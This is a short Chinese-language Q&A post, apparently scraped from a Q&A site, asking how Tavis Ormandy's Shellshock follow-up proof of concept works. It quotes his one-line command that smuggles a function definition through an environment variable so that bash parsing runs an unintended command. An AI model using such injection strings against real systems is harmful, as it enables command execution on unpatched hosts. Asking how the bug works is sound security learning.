在阅读了最新的bash漏洞后,我想知道 Tavis Ormandy 的漏洞利用是如何工作的。如何(a)=>\工作?
bash
(a)=>\
他发帖说:
bash 补丁对我来说似乎不完整,函数解析仍然很脆弱。例如 $ env X='() { (a)=>\' sh -c "echo date"; cat echo Run Code Online (Sandbox Code Playgroud)
bash 补丁对我来说似乎不完整,函数解析仍然很脆弱。例如
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
bash shellshock
bash ×1
shellshock ×1